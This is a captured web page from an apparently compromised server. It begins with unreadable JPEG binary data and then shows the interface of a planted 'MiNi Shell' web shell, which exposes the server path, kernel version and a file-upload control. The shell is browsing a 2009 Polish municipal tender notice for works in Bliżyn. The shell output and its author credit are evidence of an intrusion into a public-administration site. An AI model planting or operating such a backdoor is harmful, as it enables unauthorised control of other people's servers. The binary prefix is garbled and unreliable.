JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/123234-N-2009.html

<p class="kh_header"><b>Bliżyn: Zagospodarowanie przestrzeni publicznej centrum wsi Bliżyn</b><br>
<b>Numer ogłoszenia: 123234 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bliżyn , ul. Kościuszki 79A, 26-120 Bliżyn, woj. świętokrzyskie, tel. 041 2541172, faks 041 2541236.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugblizyn.bip.doc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie przestrzeni publicznej centrum wsi Bliżyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja operacji pod nazwą Zagospodarowanie przestrzeni publicznej centrum wsi Bliżyn, który składa się z trzech części polegających na:
Część 1 - budowie parkingu na samochody osobowe na 30 miejsc postojowych wraz z budową chodników oraz zjazdów z drogi publicznej, budowie oświetlenia, rozbiórce starego i budowie nowego ogrodzenia, wykonaniu przyłącza wodociągowego, zagospodarowaniu skweru z alejkami, ławeczkami, oczkiem wodnym i zielenią.
Część 2 - remoncie wiaty autobusowej przy ul. Kościuszki w Bliżynie w tym: wymianie połaci dachowej, wykonaniu elewacji z okładziny kamiennej oraz tynków żywicznych, zabudowy ławki pod wiatą oraz montażu nowych ławek w obrębie wiaty autobusowej.,
Część 3 - remoncie istniejących zjazdów z drogi gminnej Bliżyn ul. Szkolna do budynku Ochotniczej Straży Pożarnej wraz z utwardzeniem dojść i dojazdów na terenie OSP..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.22.33.00-9, 45.23.31.40-2, 45.34.20.00-6, 45.11.27.10-5, 45.23.32.22-1, 39.11.36.00-3, 34.92.84.80-6, 45.23.13.00-8, 45.31.61.00-6, 45.21.33.11-6, 45.23.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie będzie pobierał wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Dla każdej części zamówienia Zamawiający określa takie same warunki udziału w postępowaniu za wyjątkiem warunku określonego w pkt 3 i 4, a dotyczącego zakresu wykonania robót z należytą starannością.
O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy którzy:
1)	spełniają warunki określone w art. 22 ust.1 Pzp,
2)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 Pzp,
3)	mają do dyspozycji odpowiednio wykwalifikowany personel w celu zrealizowania przedmiotu zamówienia, dysponują osobami posiadającymi uprawnienia do kierowania robotami w specjalności: 					
a) dla części 1 zamówienia: drogowej, sieci i instalacji elektrycznych, konstrukcyjno-budowlanej, instalacji wodociągowych,	
b) dla części 2 zamówienia: konstrukcyjno - budowlanej,	
c) dla części 3 zamówienia: budowli dróg.					
Osoby te winny posiadać zaświadczenie o przynależności do właściwej izby samorządu zawodowego,
4)	zrealizowali z należytą starannością w ostatnich 5 latach, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, przynajmniej 1 robotę budowlaną o podobnym zakresie i charakterze tj. :				
a) dla części 1 zamówienia: budowę, przebudowę lub remont parkingu lub chodnika  o powierzchni min. 800m2,								
b) dla części 2 zamówienia: budowę, przebudowę remont kubaturowego obiektu budowlanego,									
c) dla części 3 budowę, przebudowę lub remont parkingu lub chodnika  o powierzchni min. 500m2,	
5)	mogą dysponować sprzętem, niezbędnym do realizacji zamówienia.

Ocena spełnienia warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wymienionych w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć w terminie składania ofert w formie określonej w niniejszej SIWZ:
1)	Formularz oferty wg załącznika nr 1,
2)	Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 i art. 24 Pzp - załącznik nr 2 i załącznik nr 2A dla członków konsorcjum,
3)	Oświadczenie, że wykonawca zapoznał się ze SIWZ, projektem umowy i, że przyjmuje je bez zastrzeżeń (na druku oferty wykonania),
4)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5)	Wykonawcy którzy wspólnie ubiegają się o udzielenie zamówienia publicznego (konsorcjum) winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i do zawarcia umowy. W przypadku składania wspólnej oferty przez konsorcjum, każdy członek konsorcjum zobowiązany jest do złożenia:							
a) oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 pkt 4 z wyłączeniem art. 24 ust. 1 pkt 10 ustawy Prawo zamówień publicznych wg załącznika 2A,	
b) dokumentów wymienionych w pkt IX ppkt 4 i 6 SIWZ. 		
Ponadto pełnomocnik konsorcjum winien złożyć Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 i art. 24 Prawa zamówień publicznych w imieniu konsorcjum wg załącznika 2. Pozostałe oświadczenia i dokumenty przygotowywane są wspólnie. 
6)	Aktualne (na dzień złożenia oferty) zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
7)	W przypadku ubiegania się o udzielenie zamówienia spółki cywilnej należy przedłożyć umowę spółki, dokument, z którego będzie wynikać sposób reprezentowania spółki (w przypadku gdy oferta i dokumenty w ofercie będą podpisane przez nie wszystkich członków spółki) oraz aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej oraz zaświadczenia o których mowa w pkt 6 dotyczące wszystkich członków spółki,
8)	Oświadczenie wykonawcy z art. 36 ust.4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - załącznik nr 3,
9)	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - załącznik nr 4;
10)	 W przypadku, gdy Wykonawca nie dysponuje osobami zdolnymi do wykonania zamówienia winien przedłożyć pisemne zobowiązanie innego podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie, o którym mowa w pkt 9, wykonawca wskazał osoby, którymi będzie dysponował,
11)	Dokumenty potwierdzające że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane do kierowania robotami w specjalności: 							
a) dla części 1 zamówienia: drogowej, sieci i instalacji elektrycznych, konstrukcyjno-budowlanej, instalacji wodociągowych,	
b) dla części 2 zamówienia: konstrukcyjno - budowlanej,	
c) dla części 3 zamówieni: budowli dróg.
12)	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania zawierający przynajmniej 1 robotę budowlaną tj:		
a) dla części 1 zamówienia: budowę, przebudowę lub remont parkingu lub chodnika  o powierzchni min. 800m2,								
b) dla części 2 zamówienia: budowę, przebudowę remont kubaturowego obiektu budowlanego,									
c) dla części 3 budowę, przebudowę lub remont parkingu lub chodnika  o powierzchni min. 500m2									
z określeniem daty i miejsca wykonania - załącznik nr 5. 
13)	Dokumenty potwierdzające, że roboty wymienione w wykazie zostały wykonane należycie.
14)	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca.
15)	W przypadku dysponowania narzędziami i urządzeniami innych podmiotów Wykonawca winien przedstawić pisemne zobowiązanie innego podmiotu o ich udostępnieniu jeżeli 
w wykazie, o którym mowa w pkt 14, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował,.
16)	Oświadczenie o dokonaniu wizji lokalnej i zapoznaniu się z dokumentacją projektową - załącznik nr 7,
Wszystkie dokumenty winny być dołączone do oferty w formie oryginału lub kopii poświadczonej za zgodność przez Wykonawcę. Poświadczenia za zgodność z oryginałem można dokonać w dwojaki sposób tj.: 
1)	na każdej stronie dokumentu lub 
2)	w przypadku dokumentów wielostronicowych, każdy dokument oddzielenie można poświadczyć (za zgodność z oryginałem) na pierwszej stronie z podaniem ilości stron tego dokumentu.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskie wówczas oświadczenia i dokumenty wymagane od wykonawców w celu potwierdzenia spełnienia warunków udziału w postępowaniu winien złożyć zgodnie z postanowieniami § 2 ust. 1- 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugblizyn.bip.doc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bliżyn
26-120 Bliżyn ul. Kościuszki 79a
woj. świętokrzyskie, pow. skarżyski
tel. (0-41) 254-11-72 fax (0-41) 254-12-3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 08:45, miejsce: Urząd Gminy Bliżyn
26-120 Bliżyn ul. Kościuszki 79a
woj. świętokrzyskie, pow. skarżyski
pok. nr 1 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Zagospodarowanie przestrzeni publicznej centrum wsi Bliżyn aplikuje o dofinansowanie z Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013 działanie Odnowa i rozwój wsi..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa parkingu na samochody osobowe na 30 miejsc postojowych wraz z budowa chodników oraz zjazdów z drogi publicznej, budowa oświetlenia, rozbiórka starego i budowa nowego ogrodzenia, wykonanie przyłącza wodociągowego, zagospodarowanie skweru z alejkami, ławeczkami, oczkiem wodnym i zielenią..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa parkingu na samochody osobowe na 30 miejsc postojowych wraz z budowa chodników oraz zjazdów z drogi publicznej, budowa oświetlenia, rozbiórka starego i budowa nowego ogrodzenia, wykonanie przyłącza wodociągowego, zagospodarowanie skweru z alejkami, ławeczkami, oczkiem wodnym i zielenią.
Roboty polegają na wykonaiu: robót przygotowawczych, robót ziemnych, podbudowy, nawierzchni, elementów ulic, robót wykończeniowych, ogrodzenia, oświetlenia drogowego, urządzeniu zieleni, zabudowie ławek, koszy, oczka wodnego, wykonaniu przyłącza wodociągowego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.22.33.00-9, 45.23.31.40-2, 45.34.20.00-6, 45.11.27.10-5, 45.23.32.22-1, 39.11.36.00-3, 34.92.84.80-6, 45.23.13.00-8, 45.31.61.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont wiaty autobusowej przy ul. Kościuszki w Bliżynie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont wiaty autobusowej przy ul. Kościuszki w Bliżynie w tym: wymiana połaci dachowej, wykonanie elewacji z okładziny kamiennej oraz tynków żywicznych, zabudowa ławki pod wiatą oraz montaż nowych ławek w obrębie wiaty autobusowej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.33.11-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont istniejących zjazdów z drogi gminnej Bliżyn ul. Szkolna do budynku Ochotniczej Straży Pożarnej wraz z utwardzeniem dojść i dojazdów na terenie OSP.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont istniejących zjazdów z drogi gminnej Bliżyn ul. Szkolna do budynku Ochotniczej Straży Pożarnej wraz z utwardzeniem dojść i dojazdów na terenie OSP polegający na wykonaniu robót przygotowawczych, robót ziemnych, podbudowy, nawierzchni. elementów ulic, robót wykończeniowych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com